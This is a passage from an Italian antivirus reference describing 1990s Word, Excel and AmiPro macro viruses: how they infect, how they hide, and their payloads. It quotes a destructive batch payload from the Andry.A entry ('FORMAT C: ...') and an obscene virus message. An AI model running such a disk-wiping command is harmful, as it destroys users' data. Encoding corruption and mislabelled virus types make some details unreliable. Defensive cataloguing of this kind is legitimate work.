comando di rinomina il virus include pause ed emette un suono. Dopo che i nomi del menu sono stati cambiati, Boom crea un nuovo modello principale (Normal.dot) ed inserisce il seguente testo: "Greetings from Mr. Boombastic and Sir WIXALOT !!! " "Oskar L., wir kriegen dich!!!" "Dies ist eine Initiative des Institutes zur Vermeidung und Verbreitung von " "Peinlichkeiten, durch in der Oeffentlichkeit stehende Personen, unter der" "Schirmherrschaft von Rudi S. !" Questo testo verrα stampato da Boom. Boom contiene anche testi supplementari come: "Mr. Boombastic and Sir WIXALOT !!!" Procedure distruttive supplementari sono state modificate da "REM's" in commenti e vengono quindi disattivate. (c) Stefan Kurtzhals [Word_Bandung] Nome del Virus: Word.Bandung. Pseudonimo: Nessuno. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 4.262 Byte (6 Macro). Sintomi: Mostra la creazione di nuovi file di windows . Paese di origine: Bandung, Indonesia. Descrizione: Questo virus infetta i documenti di MS Word. Bandung contiene 6 macro della lunghezza di 4.262 Byte. "AutoExec" "AutoOpen" "File/Salva" "File/Salva con nome" "Strumenti/macro" "Toolscustomize" Quando viene aperto un documento infetto, Bandung infetta il modello di documento principale (NORMAL.DOT). Altri documenti sono infettati con i comandi "File/Salva" e "File/Salva con nome". I documenti infetti vengono convertiti internamente in file di modello, evenienza molto comune per un virus da macro. Bandung utilizza inoltre la tecnica macro stealth per nascondersi. Usa "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un documento infetto. Con l'infezione Bandung attiva le sue procedure distruttive. Crea il file C:\PESAN.TXT con il seguente messaggio: "Anda rupanya sedang sial, semua file di mesin ini kecuali yang berada " "di direktori WINDOWS dan WINWORD telah hilang, jangan kaget, ini bukan " "ulah Anda, tapi ini hasil pekerjaan saya...Barang siapa yang berhasil " " menemukan cara menangkal virus ini, saya aka" + "n memberi listing" "virus ini untuk Anda !!! Dan tentu saja saya akan terus datang kesini" " untuk memberi Anda salam dengan virus-virus terbaru dari saya...selamat ! " " Bandung, Selasa," Al messaggio seguono giorno, mese, anno corrente, data ed ora. Esempio: 29 agosto 1996, Jam: 18:09 Bandung mostra inoltre il seguente messaggio d'errore: " Fail on step 29296 " e "No such macro or command" [Word_Atom] Nome del Virus: Word.Atom. Pseudonimo: Atomic, WM.Atom. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 1.029 Byte (4 Macro). Sintomi: Cancella i file nelle directory. I documenti sono protetti da password. Paese di origine: Ucraina. Descrizione: Questo virus infetta i documenti di MS Word. Atom.A possiede 4 macro criptate (Execute-Only) di 1.029 Byte. "Atom" "AutoOpen" "File/Apri" "File/Salva con nome" Una volta aperto un file infetto, il modello di documento principale (Normal.dot) diviene infetto se la macro "Atom" non Φ giα inclusa nella lista macro. Le macro vengono trasferite con il comando MacroCopy, quindi viene chiamata la procedura distruttiva. Atom.A infetta i documenti in due modi, sia quando viene aperto (File/Apri) che quando viene salvato un documento (File/Salva con nome). FinchΦ Atom.A non toglie i suggerimenti mentre salva il modello di documento principale (Normal.dot). All'utente Φ consigliato salvare le modifiche al modello di documento principale (Normal.dot) al termine di una sessione. I documenti infetti vengono convertiti internamente in modelli principali, evenienza molto comune per un virus da macro. Chiamando la macro "File/Salva con nome" del virus, Atom.A controlla che l'ora di sistema abbia 13 nel campo dei secondi. In questo caso Atom.A aggiunge la password "ATOM#1" al documento salvato. La procedura distruttiva nella macro "Atom" si pensava venisse attivata solo il giorno 13 dicembre. A causa di un errore di programmazione viene invece attivata il giorno 13 di ogni mese. Atom.A cancella tutti i file nella directory corrente. Atom.A non lavora con una versione di Microsoft Word non in inglese, dato che utilizza nomi di macro in inglese. (c) Stefan Kurtzhals [Excel_Laroux.A] Nome del virus: Excel.Laroux.A. Tipo di Virus: Virus da macro di Word. Numero di moduli: 1. Nome del modulo: laroux. Sub-Routine: Auto_Open, Check_Files. Paese di origine: USA. Data di origine: 1996. Payload: No. Rilevato In The Wild: Si. Descrizione: Laroux Φ il primo virus da macro scritto per Microsoft Excel. Quando viene aperto un file infetto (Auto_Open), viene chiamata la macro "Check_files" (dalla macro Auto_Open) e PERSONAL.XLS (simile a NORMAL.DOT di Word) diviene infetto. Altri file divengono infetti quando sono attivati (OnSheetActivate). Le seguenti sezioni della sezione "File Properties" sono chiarite da cleared Laroux: Titolo Soggetto Autore Parole chive Commenti Laroux non Φ distruttivo e la sua macro (laroux) non Φ nascosta all'operatore. Pu≥ essere localizzato con l'opzione Tools/Macro di Word. [Excel_Robocop] Nome del virus: Excel.Robocop. Tipo di Virus: Virus da macro di Word. Numero di moduli: 2. Nome del modulo: ROBO, COP. Sub-Routine: Auto_Open. Paese di origine: Germania. Data di origine: Sconosciuta. Payload: Si. Rilevato In The Wild: No. Descrizione: Robocop Φ un virus da macro di Excel che fu pubblicato su Internet. Quando viene aperto un file infetto (Auto_Open chiamato da ROBO), il PERSONAL.XLS diviene infetto. Altri file sono infettati quando vengono aperti (SheetActivate). Il giorno 1 marzo di ogni anno, Robocop inserisce nel documento aperto il seguente testo: " ROBOCOP Nightmare Joker [SLAM] " [Excel_Sofa (a.k.a. MicroSofa)] Nome del virus: Excel.Sofa (a.k.a. MicroSofa). Tipo di Virus: Virus da macro di Word. Numero di moduli: 1. Nome del modulo: (11 spazi). Sub-Routines: Auto_Open, Auto_Range, Auto_Close, Current_Open. Paese di origine: USA Data di origine: Sconosciuta. Distruttivo: No. Rilevato In The Wild: No. Descrizione: Sofa fu il secondo virus da macro di Excel (dopo Laroux). Quando viene aperto un file infetto, il titolo "Microsoft Excel" viene cambiato in "Microsofa Excel" e la procedura di infezione Φ descritta sopra. Inizialmente Sofa cerca il file BOOK.XLT. Se non lo trova, il sistema non viene ancora infettato e compare il seguente messaggio: " Microsoft Excel has detected a corrupted add-in file " " Click OK to repair this file " Sofa crea quindi il file infetto e mostra: " File successfully repaired! " Al successivo utilizzo di Excel, il file BOOK.XLT infetto viene caricato nel sistema ed i file seguenti divengono infetti. [Excel_Legend] Nome del virus: Excel.Legend. Tipo di Virus: Virus da macro di Word. Numero di moduli: 1. Nome del modulo: Legend. Sub-Routine: Auto_Open, Infect. Paese di origine: USA. Data di origine: Sconosciuta. Distruttivo: No. Rilevato In The Wild: No. Descrizione: Legend Φ un altro virus da macro di Excel che fu pubblicato su Internet. Quando viene aperto un file infetto, "Auto_Open" imposta la sub-routine "Infect" come un SheetActivate. Come risultato tutte le sheets attivate chiamano la sub-routine "Infect" e PERSONAL.XLS o la active sheet divengono infetti. Per rendere pi∙ difficile il riconoscimento di un'infezione, Legend rimuove l'opzione Tools/Macro (chiamata tecnica macro stealth). Legend non infetta i file se il nome dell'utente Φ " Pyro " ed il nome dell'organizzazione Φ: " VBB ". Legend mostra il seguente messaggio: " Pyro [VBB] " " You've Been Infected By Legend! " [Lotus.Green_Stripe] Nome del virus: Lotus.Green_Stripe. Tipo di Virus: Virus da macro di Word.. Misura: 6.256 Byte. Paese di origine: USA. Data di origine: 1996. Payload: Si. Rilevato In The Wild: No. Descrizione: Green_Stripe Φ il primo virus dimostrativo scritto per Lotus. AmiPro. Mentre i virus da macro di Microsoft Word si diffondono molto rapidamente, Green_Stripe Φ molto improbabile che si diffonda in the wild. AmiPro mantiene i suoi file da macro separati dal documento e perci≥ non si diffonde molto. Per assicurare l'infezione di entrambi i file, il documento e le macro devono essere stati trasmessi. Ci≥ Φ molto improbabile che accada quando un utente invia un file infetto via e-mail. Quando viene aperto un file infetto, la macro (*.smm) Φ attivata. A questo punto Green_Stripe attraverso la directory del documento cerca di aprire ogni file infetto (.sam). L'operatore vedrα i file aprirsi e chiudersi molto velocemente e questo dovrebbe allarmarlo. Green_Stripe crea un messaggio di errore quando cerca di aprire un file giα aperto. Nuovi file da macro infetti vengono salvati con estensione *.smm e nascosti. Ulteriori documenti divengono infetti se salvati con l'opzione "Salva" o "Salva con nome". Un altro segnale che deve far insospettire Φ la casella "Salva con nome", che risulta diversa rispetto a quella originale. La nuova casella possiede il seguente titolo: " Macro Get String " GreenStripe attiva la sua procedura distruttiva quando viene salvato un file infetto. Sostituisce la parola "its" con "it is". Questa parte del virus non Φ sempre in funzione. [Word_Alliance] Nome del virus: Word.Alliance. Tipo di Virus: Virus da macro di Word. Numero di Macro: 1. Criptato: No. Nome della Macro: AutoOpen. Lunghezza della Macro: 352 Byte. Paese di origine: USA. Data di origine: Estate 1996. Distruttivo: No. Rilevato In The Wild: No. Descrizione: All'apertura di un documento infetto, Alliance infetta il modello di documento principale (NORMAL.DOT). Altri documenti vengono infettati quando vengono aperti ("AutoOpen"). Alliance Φ infettante solo: Il giorno 2 di ogni mese. Il giorno 7 di ogni mese. Il giorno 11 di ogni mese. Il giorno 12 di ogni mese. Alliance aggiunge alla sezione File/Proprietα il seguente commento: " You have been infected by the Alliance " [Word_Alien.A] Nome del virus: Word.Alien.A. Tipo di Virus: Virus da macro di Word. Numero di Macro: 3. Criptato: Si. Nomi delle Macro: AutoOpen, AutoClose, File/Salva con nome. Lunghezza della Macro: 7.037 Byte. Paese di origine: India. Data di origine: Novembre 1996. Payload: Si. Rilevato In The Wild: No. Descrizione: Alien infetta il modello di documento principale (normal.dot) quando viene aperto un file infetto. Altri documenti divengono infetti quando vengono aperti o chiusi. Prima di infettare, Alien controlla la stringa "Alien." Se Φ giα presente, non procede all'infezione. Le opzioni "ToolsCustomize" e "Strumenti/Macro" vengono rimosse da Alien per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Con una probabilitα del 50% Alien mostra il seguente messaggio, il giorno 1 agosto, e nasconde il "program manager" in Windows 3.x: " Another Year of Survival " Non si Φ pi∙ in grado di chiudere Windows. Con una probabilitα del 50% Alien mostra il seguente messaggio: " It's Sunday & I intend to relax " Alien cerca quindi di nascondere il "program manager" e termina Microsoft Word senza salvare il documento attivo. Alien mostra diversi messaggi: " You Fascinate Me. " " Look No Furhter... " " Hi Beautiful ! " " I'll Be Back ! " " Three Cheers For The Alien. Hip Hip Hooray ! " " Don't Believe the Hype ! " " Always Back Up Your Data. " " Don't Believe All Tips ! " " Never Trust An Alien ! " " Never Open Other Files ! " " The 'Alien' Virus Has Arrived ! " " The Alien Lives... " " Longer File Names Should Be Used. " [Word_Alien.B] Nome del virus: Word.Alien.B. Tipo di Virus: Virus da macro di Word. Numero di Macro: 3. Criptato: Si. Nomi delle Macro: AutoOpen, AutoClose, File/Salva con nome. Lunghezza della Macro: 7.463 Byte. Paese di origine: Stati Uniti. Data di origine: Primavera 1997. Payload: Si. Rilevato In The Wild: No. Descrizione: Alien.B infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti o chiusi. Le opzioni "ToolsCustomize" e "Strumenti/Macro" vengono rimosse da Alien.B per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). La differenza maggiore tra questa nuova edizione ed il precedente virus Alien.A Φ che Alien.B contiene dei codici alterati. Per ulteriori informazioni si rimanda alla descrizione del virus Alien.A. [Word_Alien.C] Nome del virus: Word.Alien.C. Tipo di Virus: Virus da macro di Word. Numero di Macro: 3. Criptato: Si. Nomi delle Macro: AutoOpen, AutoClose, File/Salva con nome. Lunghezza della Macro: 7.463 Byte. Paese di origine: Stati Uniti. Data di origine: Primavera 1997. Payload: Si. Rilevato In The Wild: No. Descrizione: Alien.C infetta il modello di documento principale (normal.dot) quando viene aperto un file infetto. Altri documenti divengono infetti quando vengono aperti o chiusi. Le opzioni "ToolsCustomize" e "Strumenti/Macro" vengono rimosse da Alien.C per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). La differenza maggiore tra questa nuova edizione ed il precedente virus Alien.A Φ che Alien.C contiene dei codici modificati. Per ulteriori informazioni si rimanda alla descrizione del virus Alien.A. [Word_Alien.D] Nome del virus: Word.Alien.D. Tipo di Virus: Virus da macro di Word. Numero di Macro: 3. Criptato: Si. Nomi delle Macro: AutoOpen, AutoClose, File/Salva con nome. Lunghezza della Macro: 7.463 Byte. Paese di origine: Regno Unito. Data di origine: Primavera 1997. Payload: Si. Rilevato In The Wild: No. Descrizione: Alien.D infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti o chiusi. Le opzioni "ToolsCustomize" e "Strumenti/Macro" vengono rimosse da Alien.D per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). La differenza maggiore tra questa nuova edizione ed il precedente virus Alien.A Φ che Alien.D contiene un byte corrotto nella sua macro AutoOpen. Per ulteriori informazioni si rimanda alla descrizione del virus Alien.A. [Word_Alien.E] Nome del virus: Word.Alien.E. Tipo di Virus: Virus da macro di Word. Numero di Macro: 3. Criptato: Si. Nomi delle Macro: AutoOpen, AutoClose, File/Salva con nome. Lunghezza della Macro: 5.061Byte. Paese di origine: Sconosciuto. Data di origine: Primavera 1997. Payload: Si. Rilevato In The Wild: No. Descrizione: Alien.E infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti o chiusi. Le opzioni "ToolsCustomize" e "Strumenti/Macro" vengono rimosse da Alien.E per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). La differenza maggiore tra questa nuova edizione ed il precedente virus Alien.A Φ che Alien.E contiene dei codici modificati. Per ulteriori informazioni si rimanda alla descrizione del virus Alien.A. [Word_Alien.F] Nome del virus: Word.Alien.F. Tipo di Virus: Virus da macro di Word. Numero di Macro: 3. Criptato: Si. Nomi delle Macro: AutoOpen, AutoClose, File/Salva con nome. Lunghezza della Macro: 8.201Byte. Paese di origine: Stati Uniti. Data di origine: Primavera 1997. Payload: Si. Rilevato In The Wild: No. Descrizione: Alien.F infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti o chiusi. Le opzioni "ToolsCustomize" e "Strumenti/Macro" vengono rimosse da Alien.F per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). La differenza maggiore tra questa nuova edizione ed il precedente virus Alien.A Φ che Alien.F contiene una macro "File/Salva con nome" corrotta. Per ulteriori informazioni si rimanda alla descrizione del virus Alien.A. [Word_Anak.A] Nome del virus: Word.Anak.A. Tipo di Virus: Virus da macro di Word. Numero di Macro: 5. Criptato: Si. Nomi delle Macro: anakAE, AutoOpen,anakAO, anakSA, anakSMU, (AutoExec, File/Salva). Lunghezza della Macro: 5.578 Byte nei documenti, 4.737 Byte nel modello di documento principale. Paese di origine: Indonesia. Data di origine: Marzo 1997. Payload: Si. Rilevato In The Wild: No. Descrizione: Anak infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono salvati (FileSalva). Anak rimuove Strumenti/Macro, FileTemplates, e ToolsCustomize per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Alla fine di ogni mese (partendo dal giorno 26), Anak crea un nuovo file e vi inserisce il seguente testo: " ...i n t r o d u c i n g...anakSMU Semarang, March 1997 " Anak modifica inoltre il file C:\AUTOEXEC.BAT per aggiungersi al registro di sistema: " @ECHO OFF " " REM --------------------------------------------------------- " " REM anakSMU wont destroy your REGEDIT, Just wanna be there :) " " REM email: anakSMU@TheOffice.net" " " REM --------------------------------------------------------- " Anak mostra il seguente messaggio: " Yeah!, I wish I were anakSMU. " [Word_Andry.A] Nome del virus: Word.Andry.A. Tipo di Virus: Virus da macro di Word. Numero di Macro: 1. Criptato: Si. Nomi delle Macro: AutoOpen. Lunghezza della Macro: 6.896 Byte. Paese di origine: Indonesia. Data di origine: Primavera 1997. Distruttivo: Si. Rilevato In The Wild: No. Descrizione: Andry.A infetta il modello di documento principale (normal.dot) ) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). Andry nasconde FileTemplate, Formato/Stile, Strumenti/Customize, Strumenti/Macro, e Visualizza/Barra degli strumenti per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Si avvisa di non usare tali comandi dopo che Andry ha attaccato la sua macro virale a questi comandi. Il giorno 1 marzo, Andry cripta i suoi documenti infetti con la seguente password: " Andry Christian " Se si trova un documento con una password sconosciuta, scaricare una copia di WinWord Password Recovery Tool (wwprt). E' disponibile al sito: www.vdsarg.com. Quando viene aperto un documento ed il campo dei secondi mostra 1 o 3, Andry sostituisce tutto il testo con: " Hello...Andry Christian WordMacro Virus is Here...." Sempre il giorno 1 marzo, Andry mostra il seguente messaggio e chiede all'operatore un input: " HACKERS Labs '96 - Hackware Technology Research " " ANDRY [CHRISTIAN] VIRUS DA MACRO DI WORD IS HERE !!! " " DO YOU SUPPORT MY VIRUS ? " Se "Si", non succede nulla. Se "No", Andry sovrascrive il file AUTOEXEC.BAT e cerca di formattare l'hard disk. " @ECHO OFF " " CLS " " ECHO Please wait . . . " " FORMAT C: /U /C /S /AUTOTEST > NUL " Si pu≥ ritrovare nel codice del virus il seguente commento: "=====================================================================" " Source Code of Andry Christian WordMacro Virus 0.99 - _eta Release " "=====================================================================" " Virographer by Andry [Christian] in [Batavia] City, of INDONESIA " " Viroright (C) 1996-1999 Hackware Technology Research - HACKERS Labs." " Multi Platform, Multi Infector, Stealth, OneMacro, Encryption, etc " " Last Update by 01-Maret-1996 & 01:03 PM - Found Bugs...? Call Me " "=====================================================================" " HACKERS Labs. -> WE ARE A BIG FAMILY OF THE VIRUS CREATOR's TEAM " "=====================================================================" [Word_Appder.A] Nome del virus: Word.Appder.A (a.k.a.FunYour). Tipo di Virus: Virus da macro di Word. Numero di Macro: 2 o 3. Criptato: No. Nomi delle Macro: Appder, AutoOpen, AutoClose. Lunghezza della Macro: 1.912 Byte nei file .doc, 1.126 Byte nel modello di documento principale. Paese di origine: Sconosciuto. Data di origine: Sconosciuta. Distruttivo: Si. Rilevato In The Wild: No. Descrizione: Appder infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono chiusi. Appder aggiunge un valore "NTTHNTA=xx" alla sezione [Microsoft Word] di winword6.ini ed aumenta il valore di uno mentre infetta i documenti. Al raggiungimento del valore di 20, Appder attiva la sua procedura distruttiva e cancella i seguenti file: C:\DOC\*.exe C:\DOC\*.com C:\WINDOWS\*.exe C:\WINDOWS\SYSTEM\*.TTF C:\WINDOWS\SYSTEM\*.FOT Come conseguenza, Windows 3.x non lavora correttamente. [Word_Appder.B (a.k.a.FunYour)]. Nome del virus: Word.Appder.B (a.k.a.FunYour). Tipo di Virus: Virus da macro di Word. Numero di Macro: 2 o 3. Criptato: No. Nomi delle Macro: Appder, AutoOpen, AutoClose. Lunghezza della Macro: 1.528 Byte nei documenti, 934 Byte nel modello di documento principale. Paese di origine: Sconosciuto. Data di origine: Sconosciuta. Distruttivo: No. Rilevato In The Wild: Si. Descrizione: La differenza tra questa nuova versione e l'originale virus Appder.A Φ che la procedura Φ stata cancellata da un codice di macro, quindi Appder.B non cancella tutti i file. Appder.B infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono chiusi. (AutoClose). [WordAppder.C (a.k.a.FunYour)] Nome del virus: Word.Appder.C (a.k.a.FunYour). Tipo di Virus: Virus da macro di Word. Numero di Macro: 2 o 3. Criptato: No. Nomi delle Macro: Appder, AutoOpen, AutoClose. Lunghezza della Macro: 1.912 Byte nei file .doc, 1.126 Byte nel modello di documento principale. Paese di origine: Sconosciuto. Data di origine: Sconosciuta. Distruttivo: Si. Rilevato In The Wild: No. Descrizione: La differenza tra questa nuova versione e l'originale virus Appder.A Φ che Appder.C possiede un Byte modificato. Appder.C infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono chiusi. (AutoClose). Appder.C aggiunge un valore "NTTHNTA=xx" alla sezione [Microsoft Word] di winword6.ini ed aumenta il valore di uno mentre infetta i documenti. Al raggiungimento del valore di 20, Appder.C attiva la sua procedura distruttiva e cancella i seguenti file: C:\DOC\*.exe C:\DOC\*.com C:\WINDOWS\*.exe C:\WINDOWS\SYSTEM\*.TTF C:\WINDOWS\SYSTEM\*.FOT Come conseguenza, Windows 3.x non lavora correttamente. [Word_Atom.A (a.k.a Atomic)] Nome del virus: Word.Atom.A (a.k.a. Atomic). Tipo di Virus: Virus da macro di Word. Numero di Macro: 4. Criptato: Si. Nomi delle Macro: Atom, AutoOpen, File/Apri, File/Salva con nome. Lunghezza della Macro: 1.029 Byte. Paese di origine: Ucraina. Data di origine: Febbraio 1996. Distruttivo: Si. Rilevato In The Wild: S.i Descrizione: Atom infetta il modello di documento principale (Normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando un documento viene aperto (File/Apri) o salvato (File/Salva con nome). Quando viene chiamata la macro "File/Salva con nome", Atom controlla che l'ora di sistema abbia 13 nel campo dei secondi. In questo caso, Atom aggiunge la password "ATOM#1" per salvare il documento. La procedura distruttiva in "Atom" viene attivata il giorno 13 di ogni mese. In questa data, Atom cancella tutti i file nella directory corrente. [Word_Atom.B] Nome del virus: Word.Atom.B. Tipo di Virus: Virus da macro di Word. Numero di Macro: 4. Criptato: Si. Nomi delle Macro: Atom, AutoOpen, File/Apri, File/Salva con nome. Lunghezza della Macro: 1.053 Byte. Paese di origine: Sconosciuto. Data di origine: Dicembre 1996. Distruttivo: Si. Rilevato In The Wild: No. Descrizione: La differenza tra questa nuova versione ed il virus Atom.A originale Φ di secondaria importanza. Essa non altera la funzionalitα di questa nuova versione. Per ulteriori informazioni si rimanda alla descrizione del virus Atom.A. [Word_Atom.C] Nome del virus: Word.Atom.C. Tipo di Virus: Virus da macro di Word. Numero di Macro: 4. Criptato: Si. Nomi delle Macro: Atom, AutoOpen, File/Apri, File/Salva con nome. Lunghezza della Macro: 1.026 Byte. Paese di origine: Sconosciuto. Data di origine: Dicembre 1996. Distruttivo: Si. Rilevato In The Wild: No. Descrizione: La differenza tra questa nuova versione ed il virus Atom.A originale Φ di secondaria importanza. Essa non altera la funzionalitα di questa nuova versione. Per ulteriori informazioni si rimanda alla descrizione del virus Atom.A. [Word_Atom.D] Nome del virus: Word.Atom.D. Tipo di Virus: Virus da macro di Word. Numero di Macro: 4. Criptato: Si. Nomi delle Macro: Atom, AutoOpen, File/Apri, File/Salva con nome. Lunghezza della Macro: 1.024 Byte. Paese di origine: Sconosciuto. Data di origine: Dicembre 1996. Distruttivo: Si. Rilevato In The Wild: No. Descrizione: La differenza tra questa nuova versione ed il virus Atom.A originale Φ di secondaria importanza. Essa non altera la funzionalitα di questa nuova versione. Per ulteriori informazioni si rimanda alla descrizione del virus Atom.A. [Word_Atom.E] Nome del virus: Word.Atom.E. Tipo di Virus: Virus da macro di Word. Numero di Macro: 4. Criptato: Si. Nomi delle Macro: Atom, AutoOpen, File/Apri, File/Salva con nome. Lunghezza della Macro: 1.017 Byte. Paese di origine: Sconosciuto. Data di origine: Dicembre 1996. Distruttivo: Si. Rilevato In The Wild: No. Descrizione: La differenza tra questa nuova versione ed il virus Atom.A originale Φ di secondaria importanza. Essa non altera la funzionalitα di questa nuova versione. L'errore di programmazione di Atom.A, che attiva la procedura il giorno 13 di ogni mese, in questa nuova versione Φ stato fissato. Atom.E si attiva solo il giorno 13 dicembre. Per ulteriori informazioni si rimanda alla descrizione del virus Atom.A. [Word_Atom.F] Nome del virus: Word.Atom.F. Tipo di Virus: Virus da macro di Word. Numero di Macro: 4. Criptato: Si. Nomi delle Macro: Atom, AutoOpen, File/Apri, File/Salva con nome. Lunghezza della Macro: 1022 Byte. Paese di origine: Sconosciuto. Data di origine: Dicembre 1996. Distruttivo: Si. Rilevato In The Wild: No. Descrizione: La differenza tra questa nuova versione ed il virus Atom.A originale Φ di secondaria importanza. Essa non altera la funzionalitα di questa nuova versione. Per ulteriori informazioni vedere la descrizione del virus Atom.A. [Word_Atom.G:De (a.k.a Atomic)] Nome del virus: Word.Atom.G:De (a.k.a. Atomic). Tipo di Virus: Virus da macro di Word. Numero di Macro: 4. Criptato: Si. Nomi delle Macro: Atom, AutoOpen, DateiOeffnen, DateiSpeichernUnter. Lunghezza della Macro: 1120 Byte. Paese di origine: Germania. Data di origine: Febbraio 1996. Distruttivo: Si. Rilevato In The Wild: No. Descrizione:. Atom.G infetta il modello di documento principale (Normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti (DateiOeffnen) o quando vengono salvati (DateiSpeichernUnter). Quando viene chiamata la macro "DateiSpeichernUnter", Atom.G controlla che l'ora di sistema abbia 13 nel secondo campo. In questo caso, Atom aggiunge la password "ATOM#1" per salvare il documento. La procedura distruttiva in "Atom" viene attivata il giorno 13 dicembre. In questa data, Atom cancella tutti i file nella directory in uso. Atom.G lavora solo con la versione tedesca di Microsoft Word, in quanto utilizza una un linguaggio specifico delle macro. [Word_Atom.H (a.k.a Adultsex)] Nome del virus: Word.Atom.H (a.k.a. Adultsex). Tipo di Virus: Virus da macro di Word. Numero di Macro: 4. Criptato: Si. Nomi delle Macro: Atom, AutoOpen, File/Apri, File/Salva con nome. Lunghezza della Macro: 1302 Byte. Paese di origine: Sconosciuto. Data di origine: Febbraio 1996. Distruttivo: Si. Rilevato In The Wild: No. Descrizione: La differenza tra questa nuova versione ed il virus Atom.A originale Φ che in questa la procedura Φ stata modificata. AnzichΘ cancellare file, Atom.H, all'apertura di un documento, mostra il seguente messaggio: "KISS ME FUCK ME LOVE ME BITCH SUCK MY DICK ADULT SEX !! I LOVE SEX DRUGS CLASS A DRUGS YEAH MAN ! I ASK YOU MY DARLING FOR ANAL SEX GIVE IT TO ME ! EVER DANCED WITH THE DEVIL ON THE MOONLIGHT ? PREY FOR YOUR CUNT YOU SEXY HORNEY BITCH" La password aggiunta ad un documento salvato cambia da "ATOM#1" a "ADULTSEX#1." Per ulteriori informazioni vedere la descrizione del virus Atom.A. [Word_Attack.A] Nome del virus: Word.Attack.A. Tipo di Virus: Virus da macro di Word. Numero di Macro: 8. Criptato: Si. Nomi delle Macro: AutoOpen, Active, Attack, File/Apri, File/Salva con nome, InActive, Organizer, Strumenti/Macro. Lunghezza della Macro: 8201 Byte. Paese di origine: Regno Unito. Data di origine: Primavera 1997. Payload: Si. Rilevato In The Wild: No. Descrizione: Attack.A infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti (File/Apri) o quando vengono salvati (File/Salva con nome). Attack utilizza Strumenti/Macro per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Attack possiede diverse procedure: 1. Cancella i file. 2. Cambia gli attributi del file da nascondere. 3. Sostituisce il testo con: " This is Microsoft Bang!**Virus**--- " 4. Mette la seguente password ai documenti salvati: " Virii " Se si trova un documento con una password sconosciuta, scaricare una copia di WinWord Password Recovery Tool (wwprt). E' disponibile al sito: www.vdsarg.com. [Word_Badboy.A] Nome del virus: Word.Badboy.A. Tipo di Virus: Virus da macro di Word. Numero di Macro: 5. Criptato: Si. Nomi delle Macro: BadBoy, File/Nuovo, AutoExec, AutoOpen, File/Salva con nome. Lunghezza della Macro: 1873 Byte. Paese di origine: Sconosciuto. Data di origine: Sconosciuta. Payload: Si. Rilevato In The Wild: No. Descrizione: Badboy infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono salvati con il comando "File/Salva con nome". Quando viene aperto un file infetto il giorno 1 o 13 del mese (normal.dot Φ giα infetto), Badboy mostra il seguente messaggio e aggiunge la password "gangsta" al documento attivo: " Bad Boy BadBoy, What u gonna do " " What u gonna do when they come for you " " The Gangsta owns you ! " " Have a happy new year ! " Badboy modifica inoltre il File Summary info in: " Author = Kenny-G sux " " Keywords = Gangsta Rappa " " Comments = The Mutha mix " Per rendere pi∙ difficile l'identificazione di un file infetto Badboy Rimuove i men∙ Strumenti/Macro, Tools/Customize e File/Templates (chiamata tecnica macro stealth). [Word_Bandung.A (a.k.a. Jakarta)] Nome del virus: Word.Bandung.A (a.k.a. Jakarta). Tipo di Virus: Virus da macro di Word. Numero di Macro: 6. Criptato: No. Nomi delle Macro: AutoExec, AutoOpen, File/Salva, File/Salva con nome Strumenti/Macro, Toolscustomize. Lunghezza della Macro: 4262 Byte. Paese di origine: Bandung, Indonesia. Data di origine: Agosto/Settembre 1996. Distruttivo: Si. Rilevato In The Wild: Si. Descrizione: Bandung infetta il modello di documento principale (Normal.dot) quando viene aperto un documento infetto. Altri documenti vengono infettati con i comandi "File/Salva" e "File/Salva con nome". Bandung utilizza la tecnica macro stealth per nascondersi. Usa "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). La procedura distruttiva si attiva quando parte Microsoft Word. Controlla che la data sia successiva al giorno 19 del mese e l'ora successiva alle 11:00. Se "SI" Bandung cancella tutti i file in tutte le directory. Fanno eccezione i file situati nelle seguenti directory: C:\WINDOWS C:\WINWORD C:\WINWORD6 Dopo la cancellazione dei file, Bandung crea il file C:\PESAN.TXT. Il file contiene il seguente testo in indonesiano (tradotto in inglese): " You are unlucky, all files on this machine have been deleted, " " except for WINDOWS and WINWORD, don't panic, this is " " not your fault, but this the result of my work......Whoever " " is able to find a way to combat this virus, I will give the " " virus listing to you!!!! And of course I will constantly " " return to greet you with my new viruses .....good luck ! " " Bandung Monday, June 28 1996, 13:00 pm " Un'altra procedura sostituisce la lettera "a" con "#@." Questo si verifica quando viene chiamata la macro "ToolsCustomize". Bandung mostra anche dei messaggi d'errore di WordBasic. [Word_Bandung.B] Nome del virus: Word.Bandung.B. Tipo di Virus: Virus da macro di Word. Numero di Macro: 6. Criptato: No. Nomi delle Macro: AutoExec, AutoOpen, FileSalva, File/Salva con nome, Strumenti/macro, Toolscustomize. Lunghezza della Macro: 4262 Byte. Paese di origine: Bandung, Indonesia. 